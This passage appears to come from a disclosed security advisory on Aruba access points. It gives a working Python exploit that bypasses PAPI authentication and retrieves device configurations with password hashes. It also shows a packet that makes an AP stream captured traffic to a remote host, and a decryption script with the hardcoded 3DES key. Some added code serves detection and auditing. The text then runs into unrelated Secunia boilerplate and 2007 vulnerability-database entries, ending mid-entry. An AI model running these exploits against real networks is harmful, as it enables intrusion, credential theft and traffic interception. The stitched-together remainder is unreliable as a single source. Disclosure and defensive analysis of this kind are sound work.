^ 0x93: 10010011
================
10010011 (0x93)
The following shows the above PAPI packet for "show version" with its payload
decrypted:
0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............
0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ...........
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................
0050 3a 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 :...............
0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn
0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 0d 73 68 irdzB5dtVxb...sh
0080 6f 77 20 76 65 72 73 69 6f 6e 0a ow version.
(The string starting with "zxr..." is an HTTP session ID; see #25 for details on
how to bypass this.)
An example Python function for en-/decrypting PAPI payloads could look like
this:
def aruba_encrypt(s):
    return ''.join([chr(ord(c) ^ 0x93) for c in s])
-------------------------------------------
24. AP: PAPI protocol authentication bypass
-------------------------------------------
Besides its typical use between different Aruba devices, PAPI is also used as
an inter-process communication (IPC) mechanism between the CGI based web
frontend and the backend processes on the AP. Certain commands that can be sent
via PAPI are only supposed to be used via this IPC interface and not from an
external source. Besides the weak "encryption" that is described in #23, some
PAPI packets contain an HTTP session ID (SID), that matches the SID issued at
login to the web frontend.
Example IPC packet (payload decrypted as shown in #23):
0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............
0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ...........
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................
0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @...............
0060 00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e .......zxroCOUwn
0070 69 72 64 7a 42 35 64 74 56 78 62 00 00 13 73 68 irdzB5dtVxb...sh
0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration
0090 0a .
The SID in the example shown is "zxroCOUwnirdzB5dtVxb". The 0x14 before that
indicates the length of the 20 byte SID. If the session is expired or an
invalid session is specified, the packet is rejected by the PAPI endpoint
(msgHandler).
Replacing the 20 byte SID with 20 * 0x00 bypasses the SID check and therefore
allows unauthenticated PAPI communication with the AP.
Example IPC packet (Session ID replaced with 20 * 0x00, payload not XOR'ed for
readability):
0000 49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13 Ir............
0010 3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00 ;`;~ ...........
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................
0050 40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04 @...............
0060 00 00 00 00 00 00 14 00 00 00 00 00 00 00 00 00 ................
0070 00 00 00 00 00 00 00 00 00 00 00 00 00 13 73 68 ..............sh
0080 6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e ow configuration
0090 0a
Using the above example, it is possible to request the system configuration
from an AP, bypassing all authentication methods.
If the above packet is sent using IPC from the web frontend CGI to the backend
(localhost), the reply looks as follows:
msg_ref 303 /tmp/.cli_msg_SW9iVE
The cgi binary then reads this file and renders the content in the HTTP reply.
If the PAPI packet comes from an external address (instead of localhost) the
reply points to the AP's web server (10.0.0.26 in this case) instead of /tmp/:
msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh
Access to this file does not require authentication, which raises the severity
of this vulnerability significantly.
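Added example (not from the original advisory) for #23 and #24: a passive check for a network sensor that recovers the XOR key from the padding, decodes the payload and flags an all-zero session ID. The fixed offsets are read off the two dumps above and are assumptions about the format; the sample packets are rebuilt from those dumps.

```python
from collections import Counter

PAPI_MAGIC = b"\x49\x72"
HEADER_LEN = 0x4C                     # payload starts here in the dumps above
SID_AT = 26                           # payload offset of the SID length byte
SID_LEN = 20                          # 0x14
CMD_AT = SID_AT + 1 + SID_LEN + 2     # command length byte, after two 0x00


def recover_xor_key(payload):
    """Most frequent byte of the payload. Zero padding XORed with the key is
    the key itself (#23), so padding-heavy payloads give the key away."""
    return Counter(payload).most_common(1)[0][0]


def xor(data, key):
    return bytes(b ^ key for b in data)


def inspect(datagram):
    """Decode a PAPI command packet sent to an AP.
    Returns None if it does not match the layout shown in the advisory."""
    if datagram[:2] != PAPI_MAGIC or len(datagram) <= HEADER_LEN + CMD_AT:
        return None
    payload = datagram[HEADER_LEN:]
    key = recover_xor_key(payload)
    clear = xor(payload, key)
    if clear[SID_AT] != SID_LEN:
        return None
    sid = clear[SID_AT + 1:SID_AT + 1 + SID_LEN]
    cmd_len = clear[CMD_AT]
    command = clear[CMD_AT + 1:CMD_AT + 1 + cmd_len]
    return {
        "xor_key": key,
        "sid": sid,
        "zero_sid": not any(sid),     # the bypass indicator from #24
        "command": command.decode("ascii", "replace").strip(),
    }


# Sample packets rebuilt from the dumps above (cleartext shown there, XORed
# here to get the on-the-wire form a sensor would see).
_HEADER = bytes.fromhex(
    "49720003 7f000001 0a000001 00002013 3b603b7e 20040000 00030000 00000000"
) + bytes(44)
_PREFIX = bytes.fromhex("04000000 40040000 01fd050a 00000106 07020004 00000000 000014")
_COMMAND = b"\x00\x00\x13show configuration\n"


def _on_wire(sid):
    return _HEADER + xor(_PREFIX + sid + _COMMAND, 0x93)


WITH_SID = _on_wire(b"zxroCOUwnirdzB5dtVxb")
ZERO_SID = _on_wire(bytes(SID_LEN))

if __name__ == "__main__":
    for name, pkt in (("with SID", WITH_SID), ("zero SID", ZERO_SID)):
        result = inspect(pkt)
        flag = "ALERT" if result["zero_sid"] else "ok"
        print(name, hex(result["xor_key"]), result["command"], flag)
```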
The following Python script is a proof of concept for this vulnerability,
sending a "show configuration" packet to an AP with the IP address 10.0.0.26:
import socket
def aruba_encrypt(s):
    return ''.join([chr(ord(c) ^ 0x93) for c in s])
header = (
'\x49\x72\x00\x03\x7f\x00\x00\x01\x0a\x00\x00\x01\x00\x00\x20\x13'
'\x3b\x60\x3b\x7e\x20\x04\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
)
payload = ( # show configuration
'\x04\x00\x00\x00\x40\x04\x00\x00\x01\xfd\x05\x0a\x00\x00\x01\x06'
'\x07\x02\x00\x04\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x13\x73\x68\x6f\x77\x20\x63\x6f\x6e\x66\x69\x67\x75\x72\x61'
'\x74\x69\x6f\x6e\x0a'
)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', 1337))
sock.sendto(header + aruba_encrypt(payload), ('10.0.0.26', 8211))
buff = sock.recvfrom(4096)
print aruba_encrypt(buff[0])
Executing the above PoC:
# python arupapi.py
[...]msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh
Downloading the file referenced by the reply returns the full AP configuration,
including all users, passwords and settings (no auth is required on the HTTP
request either):
# curl -Lk http://10.0.0.26/.cli_msg_n011xh
version 6.4.2.0-4.1.1
virtual-controller-country XX
virtual-controller-key b49ff***REMOVED***
name instant-XX:XX:XX
terminal-access
clock timezone none 00 00
rf-band all
[...]
mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa
[...]
(full configuration file continues)
For APs running in "managed mode", the exploit shown above does not work. The
reason is that these APs don't provide a web server and have only a
limited set of commands that can be executed via PAPI.
Additionally, APs in managed mode do not seem to use the XOR based "encryption"
or MD5 checksums - there was no authentication/encryption found at all.
One interesting payload for APs in "managed mode" using the limited subset of
available commands is the ability to capture traffic and send it to a remote
endpoint via UDP. The example command on the controller would be:
(aruba_7030_1) #ap packet-capture raw-start ip-addr 192.168.0.1
100.105.134.45 1337 0 radio 0
This command would send all traffic of AP 192.168.0.1 from the first radio
interface in PCAP format to 100.105.134.45:1337. Wrapped in PAPI, the packet
would look like this:
0000 49 72 00 03 c0 a8 00 01 7f 00 00 01 00 00 00 00 Ir..............
0010 20 21 20 1c 20 04 01 48 14 08 36 b1 00 00 00 00 ! . ..H..6.....
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 65 ...............e
0050 78 65 63 75 74 65 43 6f 6d 6d 61 6e 64 4f 62 6a xecuteCommandObj
0060 65 63 74 02 06 02 04 03 00 08 03 00 08 00 00 04 ect.............
0070 38 32 32 35 02 06 02 04 00 00 00 03 00 00 02 00 8225............
0080 02 01 04 00 00 00 08 00 00 02 41 50 00 00 02 41 ..........AP...A
0090 50 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 55 P...PACKET-CAPTU
00a0 52 45 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 RE...PACKET-CAPT
00b0 55 52 45 00 00 09 52 41 57 2d 53 54 41 52 54 00 URE...RAW-START.
00c0 00 09 52 41 57 2d 53 54 41 52 54 00 00 07 49 50 ..RAW-START...IP
00d0 2d 41 44 44 52 00 00 0b 31 39 32 2e 31 36 38 2e -ADDR...192.168.
00e0 30 2e 31 00 00 09 74 61 72 67 65 74 2d 69 70 00 0.1...target-ip.
00f0 00 0e 31 30 30 2e 31 30 35 2e 31 33 34 2e 34 35 ..100.105.134.45
0100 00 00 0b 74 61 72 67 65 74 2d 70 6f 72 74 00 00 ...target-port..
0110 04 31 33 33 37 00 00 06 66 6f 72 6d 61 74 00 00 .1337...format..
0120 01 30 00 00 05 52 41 44 49 4f 00 00 01 30 04 00 .0...RADIO...0..
0130 00 00 00 02 00 02 01 02 00 02 00 00 00 04 73 65 ..............se
0140 63 61 00 00 04 72 6f 6f 74 ca...root
When sending this packet to an AP running in managed mode, it confirms the
command and starts sending traffic to the specified host:
[...]<re><data name="Packet capture has started for pcap-id"
pn="true">1</data></re>
---------------------------------------------------------
25. AP: Broadcast with detailed system information (LLDP)
---------------------------------------------------------
Aruba APs broadcast detailed system and version information to the wired
networks via LLDP (Link Layer Discovery Protocol).
0000 02 07 04 00 0b 86 9e 7a 32 04 07 03 00 0b 86 9e .......z2.......
0010 7a 32 06 02 00 78 0a 11 30 30 3a 30 62 3a 38 36 z2...x..00:0b:86
0020 3a XX XX 3a XX XX 3a XX XX 0c 3a 41 72 75 62 61 :XX:XX:XX.:Aruba
0030 4f 53 20 28 4d 4f 44 45 4c 3a 20 52 41 50 2d 31 OS (MODEL: RAP-1
0040 35 35 29 2c 20 56 65 72 73 69 6f 6e 20 36 2e 34 55), Version 6.4
0050 2e 32 2e 36 2d 34 2e 31 2e 31 2e 31 30 20 28 35 .2.6-4.1.1.10 (5
0060 31 38 31 30 29 0e 04 00 0c 00 08 10 0c 05 01 0a 1810)...........
0070 00 00 22 02 00 00 00 0e 00 08 04 65 74 68 30 fe .."........eth0.
0080 06 00 0b 86 01 00 01 fe 09 00 12 0f 03 00 00 00 ................
0090 00 00 fe 09 00 12 0f 01 03 6c 03 00 10 fe 06 00 .........l......
00a0 12 0f 04 06 76 00 00 ....v..
The broadcast packet contains the AP's MAC address, model number and exact
firmware version. This detailed information could help an attacker easily find
and identify potential targets for known vulnerabilities.
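To audit what an AP advertises on the wired side, the LLDPDU can be decoded TLV by TLV. The following Python 3 parser is an added example, not part of the original advisory; it decodes the dump shown above, with the bytes redacted as XX filled with 0x58 (ASCII "X"). The function and field names are this example's own.

```python
import re

# TLV type numbers defined by IEEE 802.1AB (LLDP).
CHASSIS_ID, PORT_DESC, SYS_NAME, SYS_DESC, MGMT_ADDR = 1, 4, 5, 6, 8
TEXT_TLVS = {PORT_DESC: "port_description", SYS_NAME: "system_name",
             SYS_DESC: "system_description"}

# LLDPDU bytes from the dump above. The bytes the advisory redacted as "XX"
# are filled with 0x58 (ASCII "X") here so that the frame stays parseable.
SAMPLE_LLDPDU = bytes.fromhex(
    "02 07 04 00 0b 86 9e 7a 32 04 07 03 00 0b 86 9e "
    "7a 32 06 02 00 78 0a 11 30 30 3a 30 62 3a 38 36 "
    "3a 58 58 3a 58 58 3a 58 58 0c 3a 41 72 75 62 61 "
    "4f 53 20 28 4d 4f 44 45 4c 3a 20 52 41 50 2d 31 "
    "35 35 29 2c 20 56 65 72 73 69 6f 6e 20 36 2e 34 "
    "2e 32 2e 36 2d 34 2e 31 2e 31 2e 31 30 20 28 35 "
    "31 38 31 30 29 0e 04 00 0c 00 08 10 0c 05 01 0a "
    "00 00 22 02 00 00 00 0e 00 08 04 65 74 68 30 fe "
    "06 00 0b 86 01 00 01 fe 09 00 12 0f 03 00 00 00 "
    "00 00 fe 09 00 12 0f 01 03 6c 03 00 10 fe 06 00 "
    "12 0f 04 06 76 00 00"
)


def parse_lldpdu(data):
    """Split an LLDPDU into (type, value) pairs, stopping at the End TLV.

    Each TLV starts with a 16-bit header: 7 bits of type, 9 bits of length.
    Raises ValueError when a TLV claims more bytes than the frame holds.
    """
    tlvs, off = [], 0
    while off + 2 <= len(data):
        header = int.from_bytes(data[off:off + 2], "big")
        tlv_type, length = header >> 9, header & 0x1FF
        off += 2
        if off + length > len(data):
            raise ValueError("TLV type %d overruns the frame" % tlv_type)
        if tlv_type == 0:  # End of LLDPDU
            break
        tlvs.append((tlv_type, data[off:off + length]))
        off += length
    return tlvs


def disclosed_fields(data):
    """Return the identifying information an LLDPDU gives to any listener."""
    out = {}
    for tlv_type, value in parse_lldpdu(data):
        if tlv_type == CHASSIS_ID and value[:1] == b"\x04":  # subtype 4 = MAC
            out["chassis_mac"] = ":".join("%02x" % b for b in value[1:])
        elif tlv_type in TEXT_TLVS:
            out[TEXT_TLVS[tlv_type]] = value.decode("ascii", "replace")
        elif (tlv_type == MGMT_ADDR and len(value) >= 6
              and value[0] == 5 and value[1] == 1):  # 4-byte IPv4 address
            out["management_ipv4"] = ".".join(str(b) for b in value[2:6])
    # The system description in the dump carries model and firmware version.
    match = re.search(r"\(MODEL: ([^)]+)\), Version (\S+)",
                      out.get("system_description", ""))
    if match:
        out["model"], out["firmware"] = match.groups()
    return out


if __name__ == "__main__":
    for field, value in sorted(disclosed_fields(SAMPLE_LLDPDU).items()):
        print("%-20s %s" % (field, value))
```

Run against frames captured on a wired segment, the output lists exactly which fields (MAC address, model, firmware build, management address) are visible to every host on that segment.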
------------------------------------------------------
26. AP: User passwords are encrypted with a static key
------------------------------------------------------
Based on the vulnerability shown in #24 which potentially discloses the
password hashes of AP user accounts, the implemented hashing algorithm was
tested. CVE-2014-7299 describes the password hashes as "encrypted password
hashes". The following line shows the mgmt-user configuration for the user
"admin" with password "admin":
mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa
Some testing with various passwords and especially password lengths showed that
the passwords are actually encrypted and not hashed (as hash algorithms produce
the same length output for different length input):
f9ac59cd431e174fb07539a8a811a1aa # admin
d7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf # adminadmin
The encryption algorithm used for the above passwords turned out to be 3DES in
CBC mode. The encryption algorithm uses a 24 byte static key which is hardcoded
on the AP. Sampling of different Firmware versions confirmed that the key is
identical for all available versions. The IV required for 3DES consists of 8
random bytes, and is stored as the first 8 bytes of the encrypted password. The
following Python script can be used to decrypt the above hashes:
import pyDes
hashes = (
'f9ac59cd431e174fb07539a8a811a1aa', # admin
'd7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf' # adminadmin
)
key = (
'\x32\x74\x10\x84\x91\x17\x75\x46\x14\x75\x82\x92'
'\x43\x49\x04\x59\x18\x69\x15\x94\x27\x84\x30\x03'
)
for h in hashes:
    d = pyDes.triple_des(key, pyDes.CBC, h.decode('hex')[:8], pad='\00')
    print h, '=>', d.decrypt(h.decode('hex')[8:])
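The length argument made above can be turned into a configuration audit check. The following Python 3 sketch is an added example, not part of the original advisory; it uses no key and decrypts nothing. It assumes the IV-plus-ciphertext layout described above and zero padding to the block size as in the script above. The user name "operator" and all function names are constructed for this example.

```python
import re

BLOCK = 8  # 3DES block size in bytes; also the IV length described above
DIGEST_LOOKALIKES = {16: "MD5", 20: "SHA-1", 32: "SHA-256"}
MGMT_USER = re.compile(
    r"^mgmt-user[ \t]+(\S+)[ \t]+((?:[0-9a-fA-F]{2})+)[ \t]*$", re.M)

# Constructed sample config. The first stored value is the advisory's example
# for the password "admin"; the second is its value for "adminadmin", attached
# here to a made-up user name.
SAMPLE_CONFIG = """\
version 6.4.2.0-4.1.1
mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa
mgmt-user operator d7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf
"""


def layout(raw):
    """Describe raw as IV || ciphertext, or return None if it cannot be that."""
    if len(raw) < 2 * BLOCK or len(raw) % BLOCK:
        return None
    blocks = len(raw) // BLOCK - 1
    return {
        "stored_bytes": len(raw),
        "iv": raw[:BLOCK].hex(),
        "ciphertext_blocks": blocks,
        # Assumption: zero padding up to the block size, so n blocks hold a
        # password of 8(n-1)+1 to 8n characters.
        "password_length": ((blocks - 1) * BLOCK + 1, blocks * BLOCK),
        # A single value can still have the size of a common digest.
        "digest_lookalike": DIGEST_LOOKALIKES.get(len(raw)),
    }


def audit_mgmt_users(config):
    """Classify the mgmt-user values of one configuration file.

    "reversible" is True only when every value fits the IV || ciphertext
    layout and the stored sizes differ between users, which a fixed-length
    hash cannot produce.
    """
    users = {}
    for name, hexval in MGMT_USER.findall(config):
        users[name] = layout(bytes.fromhex(hexval))
    fits = [u for u in users.values() if u is not None]
    sizes = {u["stored_bytes"] for u in fits}
    return {
        "users": users,
        "reversible": bool(users) and len(fits) == len(users) and len(sizes) > 1,
    }


if __name__ == "__main__":
    report = audit_mgmt_users(SAMPLE_CONFIG)
    print("reversible storage:", report["reversible"])
    for name, info in report["users"].items():
        print(name, info)
```

On its own the "admin" value has the size of an MD5 digest; only the comparison across users shows the varying length. A configuration that reports reversible storage should be handled as if it held the plaintext passwords, and every listed password rotated if the file has been exposed.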
Mitigation
==========
Aruba released three advisories, related to the issues reported here:
http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt
http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt
http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-006.txt
Following the resolution advice given in those advisories is strongly
recommended. These advisories are also available on the Aruba security bulletin:
http://www.arubanetworks.com/support-services/security-bulletins/
For the vulnerabilities related to PAPI, Aruba has made the following document
available:
http://community.arubanetworks.com/aruba/attachments/aruba/aaa-nac-guest-access-byod/25840/1/Control_Plane_Security_Best_Practices_1_0.pdf
This doc gives advice on how to remediate the PAPI related
vulnerabilities. An update fixing the issues is announced for Q3/2016.
For further information there is also a discussion thread in Aruba's Airheads
Community Forum:
http://community.arubanetworks.com/t5/AAA-NAC-Guest-Access-BYOD/Security-vulnerability-advisories/m-p/266095#M25840
Author
======
The vulnerabilities were discovered by Sven Blumenstein from Google Security
Team.
Timeline
========
2016/01/22 - Security report sent to sirt@arubanetworks.com with 90 day
disclosure deadline (2016/04/22).
2016/01/22 - Aruba acknowledges report and starts working on the issues.
2016/02/01 - Asking Aruba for ETA on detailed feedback.
2016/02/03 - Detailed feedback for all reported vulnerabilities received.
2016/02/16 - Answered several questions from the feedback, asked Aruba for
patch ETA.
2016/02/29 - Pinged for patch ETA.
2016/03/08 - Pinged for patch ETA.
2016/03/12 - Received detailed list with approx. ETA for patch releases and
current status.
2016/03/21 - Aruba asks for extension of 90 day disclosure deadline.
2016/03/24 - Asked Aruba for exact patch release dates.
2016/04/02 - Aruba confirmed 4.2.x branch update for 2016/04/15, 4.1.x branch
update for 2016/04/30 (past 90 day deadline).
2016/04/14 - 14 day grace period for disclosure was granted, according to
the disclosure policy. New disclosure date was set to 2016/05/06.
2016/05/02 - Asking for status of still unreleased 'end of April' update.
2016/05/02 - Aruba confirmed availability of update on 2016/05/09 (after grace
period).
2016/05/03 - Aruba released three advisories on
http://www.arubanetworks.com/support-services/security-bulletins/
2016/05/06 - Public disclosure.
----------------------------------------------------------------------
Secunia is proud to announce the availability of the Secunia Software
Inspector.
The Secunia Software Inspector is a free service that detects insecure
versions of software that you may have installed in your system. When
insecure versions are detected, the Secunia Software Inspector also
provides thorough guidelines for updating the software to the latest
secure version from the vendor.
1) A boundary error within the management interface can be exploited
to cause a heap-based buffer overflow by sending overly long strings
as credentials.
2) An error in the guest account authentication process within the
Captive Portal can be exploited to e.g. gain access to administrative
sections without specifying a password.
https://support.arubanetworks.com
PROVIDED AND/OR DISCOVERED BY:
John Munther and Maxim Salomon, n.runs AG
ORIGINAL ADVISORY:
http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052382.html
http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052380.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200702-0361 | CVE-2007-0900 | TagIt! Tagboard In PHP Remote file inclusion vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Multiple PHP remote file inclusion vulnerabilities in TagIt! Tagboard 2.1.B Build 2 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) configpath parameter to (a) tagviewer.php, (b) tag_process.php, and (c) CONFIG/errmsg.inc.php; and (d) addTagmin.php, (e) ban_watch.php, (f) delTagmin.php, (g) delTag.php, (h) editTagmin.php, (i) editTag.php, (j) manageTagmins.php, and (k) verify.php in tagmin/; the (2) adminpath parameter to (l) tagviewer.php, (m) tag_process.php, and (n) tagmin/index.php; and the (3) admin parameter to (o) readconf.php, (p) updateconf.php, (q) updatefilter.php, and (r) wordfilter.php in tagmin/; different vectors than CVE-2006-5249. When register_globals is enabled, TagIt! Tagboard contains a PHP remote file inclusion vulnerability. This is a different vulnerability from CVE-2006-5249. A third party may execute arbitrary PHP code via a URL in the affected parameters. TagIt! Tagboard 2.1.B Build 2 and earlier versions are vulnerable. TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
| VAR-200702-0315 | CVE-2007-0919 | Nickolas Grigoriadis Mini Web Server traversal vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Directory traversal vulnerability in Nickolas Grigoriadis Mini Web server (MiniWebsvr) 0.0.6 allows remote attackers to list the directory immediately above the web root via a ..%00 sequence in the URI. Miniwebsvr is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks.
Note that the attacker can traverse to only one directory above the current working directory of the webserver application.
Version 0.0.6 is vulnerable to this issue; other versions may also be affected
| VAR-200702-0025 | CVE-2007-0446 | HP Mercury products vulnerable to buffer overflow |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in magentproc.exe for Hewlett-Packard Mercury LoadRunner Agent 8.0 and 8.1, Performance Center Agent 8.0 and 8.1, and Monitor over Firewall 8.1 allows remote attackers to execute arbitrary code via a packet with a long server_ip_name field to TCP port 54345, which triggers the overflow in mchan.dll. Authentication is not required to exploit this vulnerability. The specific flaw exists within the process magentproc.exe that binds to TCP port 54345. When parsing packets containing an overly long 'server_ip_name' field, an exploitable stack overflow may be triggered due to an inline strcpy() within the library mchan.dll. Multiple Mercury products are prone to a stack-based buffer-overflow vulnerability because the applications fail to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will result in a denial of service. HP Mercury is an IT management software developed by Mercury acquired by HP.
-- Vendor Response:
Hewlett-Packard has issued an update to correct this vulnerability. More
details can be found at:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00854250
-- Disclosure Timeline:
2006.10.27 - Vulnerability reported to vendor
2006.11.10 - Digital Vaccine released to TippingPoint customers
2007.02.08 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by Eric DETOISIEN.
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.
----------------------------------------------------------------------
TITLE:
HP Mercury Products Long "server_ip_name" Buffer Overflow
SECUNIA ADVISORY ID:
SA24112
VERIFY ADVISORY:
http://secunia.com/advisories/24112/
CRITICAL:
Moderately critical
IMPACT:
System access
WHERE:
From local network
SOFTWARE:
Mercury LoadRunner Agent 8.x
http://secunia.com/product/13450/
Mercury Monitor over Firewall 8.x
http://secunia.com/product/13449/
Mercury Performance Center Agent 8.x
http://secunia.com/product/13448/
DESCRIPTION:
A vulnerability has been reported in various HP Mercury products,
which can be exploited by malicious people to compromise a vulnerable
system.
The vulnerability is caused due to a boundary error within MCHAN.DLL
when parsing packets sent to MAGENTPROC.EXE on port 54345/TCP.
-- Mercury LoadRunner Agent 8.1 FP4 --
NT:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/c337892f322b2311c22572670060b795?OpenDocument
AIX, HP, Solaris, Linux:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/6d7ce88c0d5c4b36c225726a004a94a2?OpenDocument
-- Mercury LoadRunner Agent 8.1 SP1, FP1, FP2, FP3 --
Update to 8.1 FP4 and apply patches listed above.
-- Mercury LoadRunner Agent 8.1 GA --
NT:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/7cd789640e496c34c225726700613486?OpenDocument
AIX, HP, Solaris, Linux:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/f2de896609dd7efbc225726a004af033?OpenDocument
-- Mercury LoadRunner Agent 8.0 GA --
NT:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/fa4a48afea2f8198c22572670061bbe7?OpenDocument
AIX, HP, Solaris, Linux:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/5de153e30789fa4ac225726a004b2354?OpenDocument
-- Mercury Performance Center Agent 8.1 FP4 --
NT:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/ae5d9a48a163fbb4c225726a004c7831?OpenDocument
AIX, HP, Solaris, Linux:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/34e894d8d8a1b941c225726a004ff335?OpenDocument
-- Mercury Performance Center Agent 8.1 FP1, FP2, FP3 --
Update to version 8.1 FP4 and apply patches listed above.
-- Mercury Performance Center Agent 8.1 GA --
NT:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/0831f8b0bd9d9619c225726a004cf7fe?OpenDocument
AIX, HP, Solaris, Linux:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/a7333913152e65e1c225726a005035e4?OpenDocument
-- Mercury Performance Center Agent 8.0 GA --
Update to version 8.1 GA and apply patches listed above.
-- Mercury Monitor over Firewall 8.1 --
NT:
http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/c9b9924b3206614fc225726a004ded7d?OpenDocument
PROVIDED AND/OR DISCOVERED BY:
Discovered by Eric Detoisien and reported via ZDI.
ORIGINAL ADVISORY:
HPSBGN02187 SSRT061280:
http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=c00854250
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-07-007.html
| VAR-200702-0108 | CVE-2007-0709 | Comodo Firewall Pro and Comodo Personal Firewall of cmdmon.sys Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
